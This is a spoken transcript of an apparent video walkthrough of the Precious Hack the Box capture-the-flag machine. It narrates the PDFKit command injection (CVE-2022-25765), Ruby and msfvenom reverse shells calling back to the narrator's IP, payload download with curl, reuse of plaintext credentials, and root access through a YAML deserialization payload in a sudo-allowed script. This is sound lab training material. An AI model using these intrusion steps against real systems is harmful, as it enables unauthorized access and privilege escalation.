Hi guys, it's Ben here, and today I'm going to be walking through the Precious Hack the Box challenge. So, if you've seen some of my previous Hack the Box videos, I've really only gone over the starting point challenges where they're guided through. This is more of a classic CTF where you're given a box and you have to find the user flag and the root flag. So, let's get on with this. I'm just going to get my screens right. 1 second. There we go. I've connected to the VPN. I'm going to go to my desktop Hack the Box directory, and I'm going to make a directory called Precious Walkthrough. I'll make sure to copy the IP over here, nice, and I'll get my terminal set up. I'm going to make recon, exploits, and nmap directories. That's because I need to seed into Precious Walkthrough. Then I'm going to make those, and I'm going to go out of group terminal mode. So yeah, I'm going to do a basic nmap scan, just do service scan, and default scripts, and I'll paste the IP in there. I'm going to output this. I'll need to be sudo. I'll output this to the nmap directory and initial.txt. So let's do some initial enumeration, see what we can find. I'll let that do its thing. So it looks like we're nearly done here. There we go. So it's found two ports. It's found an SSH port. And it's also found port 80 HTTP running an Nginx server. So there's not really much else. I mean, there isn't anything else apart from this SSH and this HTTP. The fingerprinting hasn't found an exact host, but we've got some indications that it's running Linux. So we could go have a look at the website. We could perhaps do some web recon. We could see what are these web services which are running on the box, and then we could go from there. So that's a good place to start. What I'll first do, this box is called Precious. I'm going to go into my Etsy hosts just so I can edit. Okay, that looks like it's already the right IP. I'm just going to make sure I can go to the domain instead of entering an IP each time, and we can visit this website and see what is here. So let's go to precious.hackthebox, and it's got this convert web page to PDF. If you look in the source code, it's very basic source code. It looks like this form, this submit button makes a post request. So we can sort of have a look and we can inspect this, and we can see if we just put a random word in, it would make a post request, and it said you should provide a valid URL. So if we just did or if we just supplied the IP here, out of interest, what would this do? And it's loading, and we can see this post data. It supplies the URL post parameter and then the URL which you submit here. In the first case, I just entered a load of nonsense. So it gave me this cannot load remote URL. When I tried to load the URL of this website, it didn't work either. So what I did is I decided to let's just VI web pages. Let's just make a little web page. Let's just start off with, that's not what I wanted to do, sorry. I'll remove web pages. I want to make directory web pages. And then what we can basically do is we can have a little test, and we can see if we host a basic HTTP server, what is the actual functionality? So let's just make it index.html to start off with, and this will be a very basic HTML. Please sub. Let's see what this does. I am going to need to set up a HTTP server. I'll do it on port 12343. And let's just go to my IP here, 10.16.3 on port 123, and let's load this index.html. So it loads for a bit, and then it then creates a PDF of the HTML I provided. When I originally tried this, I was wondering, look, is there some way I can get reverse shell? I'm able to upload a file. Will it be executed on the backend somehow? So that was an initial thought. I tested out uploading TXT files. I tested out uploading PHPs, Ruby files, and that didn't get me too far. One thing I'm going to do is I'll go over here and I'll cd into the recon directory, and we'll just do a whatweb on http precious.hackthebox, t that into whatweb, whatweb.log, and I'll also, on this one here, cd into recon, I'll do a basic directory fuzzing, because I want to see, look, is there any other directories we could perhaps see? Is there any other files which leak information? Where is this when we generate a PDF? Is this uploaded somewhere on the box, on the machine? So there's quite a lot of questions. So I'm just going to start off with the big fuzz. I'm going to filter code 404, and we can check this. Look, some web pages don't provide a 404 error, so I could just go to a random directory, and then look, it says not found. Is this actually giving us a 404 error? Let's see if we refresh this, and it is. So what we can do, we can filter code by 404. I'm going to get rid of this .txt, and I'm going to put precious.hackthebox in there, and I'm going to t this into fuff underscore big.log, and we'll see if that finds anything. If you look at the whatweb, it's found some more stuff. So it's powered by this Fusion Passenger, whatever this is. It's does it say? Yeah, it's using Ruby somewhere, so that may come in use. I mentioned earlier I tried to upload a Ruby file, a .rb file, just to see if that worked, and it didn't. There's certain files which it won't turn into PDFs. If you look at Wappalizer, we're sort of seeing what we've already found out. Look, there's an Nginx web server, and they're using this Fusion Passenger. So let's just search up what this is. This is the first time I saw this, and I tried to see if there's any vulnerabilities with this. And it's a web server and application server for support for Ruby, Python, and Node.js. So perhaps they're using the Fusion Passenger to implement Ruby. So how is this actual PDF being generated? Right, it's calling a remote URL or a URL, and it's getting the source code, and then it's converting it into a PDF. This isn't some built-in feature. There must be this is what I was thinking. There must be some sort of module which does this. So what we can do is we can download this file, and if I go back into here, Precious Walkthrough, I'll put this. I'm going to download this PDF because I wanted to see if we could figure out how this PDF is being generated, because I didn't know that, and it was on my mind. So if we go into the recon directory, we can see the PDF there. I want to look at the metadata. When this PDF was generated, was any revealing metadata added to it? Can we find information out which will help us identify vulnerabilities by looking at the metadata? So if we look at the metadata, and I'm just going to pipe this into PDF, let's go metadata.log. We can see at the bottom there's this generated by PDFKit v0.8.6. So that is the module, that is the package which is used to generate the PDF from a URL. So we can do some basic googling. Say that what is PDFKit, and it's v. Now what is it? 0.8.6, 0.8.6, like so. And we can see at the top there's an article by Snyk saying there's a command injection vulnerability, and the actual CVE number is here as well. So this is CVE 2022-25765. So this is a fairly new vulnerability. It's got, in terms of the CVS score, it's quite high. And you've got a basic POC here. It basically shows you how to test for it and how to use it. So what I'm actually going to do is I'm going to see, is there any pre-built tools for this? So what I originally did, and I'm not going to do this here, I opened up Metasploit and I searched up for PDFKit. I also used Searchsploit, so PDFKit, and there's no results. If you go on ExploitDB, and search a PDFKit, there is a script for it. There is a POC. You can see it was released very recently, so that is most likely why it's not in my Searchsploit, because, like I said, this was made earlier this month, this POC. So maybe when they made this challenge, this POC wasn't around, so you had to use some of the other stuff. Now it is. We can use it. So what I did is I downloaded this. So let's just download this. It's saved to 51293.py. I'm going to cd back out of my recon directory and go into my exploits directory, and I'm going to copy from my downloads folder, downloads, this 51 to my current directory. So now we've got it here. I'm just going to rename this, rename 5123.py to poc.py, just so it's a bit cleaner. And I'm just going to try execute this. I want to see what parameters do we need to supply. So this POC isn't actually, it doesn't do automated exploitation. It basically provides you the payload which you can add to the URL in order to get RC, run remote commands. It also supplies you with, if you look at this TAC S, it also supplies you a payload for generating a reverse shell, which is quite powerful. So let's try this. So let's use Python and use this poc.py. We want to use the TAC S version here because look, we want to set our ton0 IP and our port to call back for a reverse shell. So 10.10.16.3, and the local port is, let's just set that to 1337. And you do this, and okay, I didn't need to do this TAC P, sorry. There we go. And it loads, and then it generates this payload here. So it generates a Ruby reverse shell. We could have supplied like our host or like a genuine URL, and then supplied it as the parameters. You don't need to. I figured out if you just use this, it works just as fine. So now on this screen here, I'm going to get a reverse listener on port 1337. I've copied that payload. I'm going to go back to here, and I'm going to paste the payload in here. So if we run this, it sort of hangs, and it generates something, which I'm not sure if it was meant to. Let's check. So yeah, it was. So we've got a call back from the host machine here to our box. We can run some basic enumeration and see we're now running as the user Ruby. Okay. If you've seen my videos before, you'll know I don't like a netcat connection. I prefer to have a interpreter shell, just because I feel like it's a bit more powerful. So let's do that. Let's use MSF Venom to generate a interpreter shell. We can do some basic enumeration here and check. Look, this is running x64 architecture, so we can run a Linux x64 interpreter reverse TCP. The L host the host will be listening on is 10.10.16.3. The L port, I'm going to set this time to be 31337. The file format is ELF, and I'll output this as a rev shell. On the top one, I'm going to get MSF console open. And let's use multi-handler and set L host 10.10.16.3, set L port 31337. I'm going to run this, waiting for connections. This rev shell here, I need to get it onto the box somehow. What I'm going to do is I'm going to set up a Python HTTP server again. I'm going to go over to the box. I'm going to curl this on. So I'm going to curl HTTP 10.10.16.3 4123 rev shell, and I'll output this as rev shell, and we'll see we get a failure writing output to destination, and there's a permission denied error. So it looks like if we go pwd, if we go back out to PDF app and then just go lsattack.la, we can see that this is ran by root. This PDF app, this is owned by root, and all others only have read and execute privileges over it. So we can't write onto this folder. A folder we can often write onto is the temp folder. So I'm going to do this again, and 16.3 rev shell. I'm going to output this at temp rev shell this time, and I've got to put the port curl http 10.10.16.3 1234 rev shell output temp rev shell. There we go. Okay, that didn't work. Oh, because I'm not. Okay, come on. And 10.10.16.3 1234 rev shell output temp rev shell. Okay, that worked. So if we cd into temp, we can see the rev shell is now there. If you look at the permissions on rev shell, we can see it's got no execute permissions. It's owned by the Ruby user, got no execute permissions. We need to make this executable by going chmod +x rev shell, and then we can look at them again just to show you. It now has the execute bit set for all users, groups, and others. So what we can now do is execute rev shell, and it looks like we've got a segmentation fault here. It's a bit strange. I'm going to go back up to my interpreter one. I'm going to run again. Maybe when I curled it across, it... Okay. That is a bit strange. I'm going to try remove rev shell. I'm going to try generate it again. Maybe when we code it across it, sorry, what am I saying? It got a bit corrupted, so let's try send it across again and see if this works. If not, we'll just have to live in this dumb netcat shell. 1, 2, 3, 4. Rev shell output is rev shell. Okay, ls-tech-la. Rev shell's there. Chmod plus x rev shell. And I just want to. Okay, for some reason it's not working. Never mind. I'm sure it worked when I did it originally. Well, I'll close this interpreter session down here. I'll close this just to get us a bit more space. What I'll now do is I want a bit of a better looking. I want a bash shell basically. I'm going to import pty, pty.spawn bin bash. There we go. We've got a bash shell. Now let's go to the home directory and see what users are in this box. Right now we're running cd/home. Right now we're running as the like the service account Ruby. We really want to do some more enumeration to see, look, what other users are there. Well, there's this Ruby user file. We can cd into Ruby and see if there's any ls-tech-la. There is stuff of interest, but there's not a lot. If we cd back out, sorry, where are we now? I need cd into home, cd into Henry. That was the other user. If we cat this out, there's this dependencies.yml, which is there when I solved the challenge earlier. So I'm going to get rid of this. Sorry. Okay, so never mind. There's this user.txt flag. Look, it's owned by root in the group, and it can be ran by Henry, the group of Henry. If you try cat out this, we see we get permission denied. So we need to first privilege escalate to this Henry user, and then once we're at Henry, we can then work on getting to root. So what I did is ls-tech-la. Yeah. I cd'd. I'm in the right directory, so I'm in the Ruby's home directory at the moment, home/Ruby. If I list out the files with permissions, you can see a lot of these are just your regular home directory files. This .bundle one, was a bit strange because it was owned by root, but I can run it. So I went into this .bundle file, and there's this config. If you just ls again, we can see, look, we can run this file, and we can read it, and it's owned by root. So maybe that's something interesting. So let's just cat out this config, and it looks like Henry's credentials are here. So let's just test this. Let's copy these. Let's sudo into Henry, and let's paste the credentials here. We've now privilege escalated to Henry. Nice. So I'm going to go out of the bundle directory. I'm going to go out of the Ruby directory. I'm going to go in the Henry directory. I'm going to remove this dependencies.yml because that's part of the flag, not part of the flag, part of the root flag. I'm going to cat out the user.txt flag. So look, we've got the first flag here, the user.txt flag. We're halfway there. Now we need to get to root. So before getting limpies in and automating a lot of this privilege escalation enumeration stage, I like to do some basic enumeration in the command line. So the stuff I would usually do is like see if there's any SUID binaries which are run as root, but I have permissions they're owned by root, but I can run them with the permissions of root. So I'd usually go type f perm u equals s, and then pipe all of these errors into dev/null, and it would find these SUID binaries. You could then go into GTFO bins and sort of search, are any of these used for privilege escalation? Can I use these as a vector for privilege escalation? It turns out if you look through these, not many of these you can. If not, you can't with any. The next thing I usually do is look at the capabilities of the current user Henry. Is there any commands I can run with sudo privileges without a password? And there is. So I can basically it says the user Henry may run the following commands on Precious. So they can run as root with no password, Ruby user /bin Ruby, so the executable Ruby, the Ruby, not the user Ruby, the actual programming language Ruby. You can run this Ruby file update_dependencies.rb as root. So let's try this. Let's cd into opt, and we see we've got this sample and this update dependency RB. I'm going to zoom in just to get a bit more space. We can cat out this update dependencies.rb just to have a look. What is this doing? So it's loading. It's using YAML and loading this dependencies.yml file. Okay, and then it's sort of telling us the installed version differs from one in the specified file. So maybe it's looking at the versions of different modules and making sure they're the correct version. So what we can do is we know, if you look at the sudo Docker, we know we can run this as root. Let's try. So let's run sudo user bin ruby, and then it'll be /opt update dependencies.rb, and it says, look, we've got this no such file or directory, so it can't find this dependencies.yml file. Okay, that's a bit strange. If you look, we've got this sample directory here as well. If we cd into sample, have a look what's in here, we see there is a dependencies.yml now. So I wonder, what about if we can use a bin ruby opt update dependencies.yml, no, .rb, sorry. Now it runs without an error because we're in a folder which has this dependencies.yml. So initially I was like, there's this dependencies.yml file. It's called from this Ruby script. Can I change this? Do I have write permissions over this? So we can look at the permissions of this, and we can say, look, it's owned by root, and it can only be read by all other users and other groups. So that means we can't edit this dependencies.yml. And if you go back one and just ls-tech-la opt, we can see we can't write. That's not what I wanted to do. If I do ls-tech-a here, we can see the opt directory. We don't have any write permissions over this directory, so we can't even write in this opt file. Okay, so if we went back to our home/Henry, as this is our home directory, we can write in here. So let's just say, please hello world, and there's this hello world file. We can write in our home directory, which is good, right? So how about if we try run the command now? Sudo -l, let's just get it up again. Sudo user bin ruby opt update dependencies.rb, and yeah, like we expected, it gets this no such file or directory. So there isn't a dependencies.yml file in the Henry directory, so we can't use it. However, we can write to the Henry's home directory, so we can put our own malicious dependencies.yml file, which will then, as when we execute this, it'll be running with the privileges of sudo. This malicious dependencies.yml file we enter will allow us access as sudo as root. So what we can now do is look. We need to find a way we can use this, because I personally I'm not familiar with YAML. So I just searched up YAML Ruby loads reverse shell. I believe this is called a deserialization attack or something along those lines. But we'll need to find basically something we can use. There's quite a few of these. I do remember the one I used. Reading and writing YAML code. It was something like this actually. Dev. It could have been. We'll change this and let's try this. I'm not sure if this will work, but it's always worth a try. I found writing actually using VI in the box was awkward. It messed it up. So what I'll do is I'll cd into exploits. I'll just write a dependencies.yml file here. I'll insert and copy this in here, and then I'll edit it from here. So I want to change this, what it's calling back to be my own IP. So I'll get rid of this, and I'll put 10.10.16.3. The port I want to call back to, let's just say 9898. And we'll write this here. So now let's just cat out this, make sure it's saved. It looks like it has, and I can get a HTTP server now going again and try download this onto the box. So let's wget HTTP 10.10.16.3 port 1234 dependencies.yml, and we've got this dependencies.yml file. Okay, I want to go back up. Let's go back up. Let's get another terminal, and let's listen now on port 9898. And now if we run this, sudo user bin ruby opt update dependencies ruby. Let's see if this works. It may not. Okay, I guess that wasn't the right name of the file. Let's quickly. Let's find out what is this again. So it's sudo user bin ruby opt update dependencies.rb. Oh, we may need to put the password for Henry. What I'll do is I'll quickly get that in my clipboard real quick. Let's cd back into here. Let's cd into Ruby. Let's cd into .bundle. It did say we wouldn't need a password without password, so I don't know why it's prompting me for a password, but let's just get that in case we need it. And then let's try this again. Sudo user, and I want to go back out of here into Henry directory. Nice. Let's try this again. Sudo tag L, and then it's going to be sudo user bin ruby opt update dependencies.rb. So we see it takes advantage of our dependencies, our malicious dependencies file we created. That malicious dependency file we created was a reverse shell back to a different port onto our book. So we've got two reverse shells open. and we're now root. So we can go to the root and we cd into root, and we can cat out the root.txt. So we've now got both flags, and we are successfully privilege escalated to root. I hope you've enjoyed this video. It's been a fairly quick one, but I'll see you guys soon.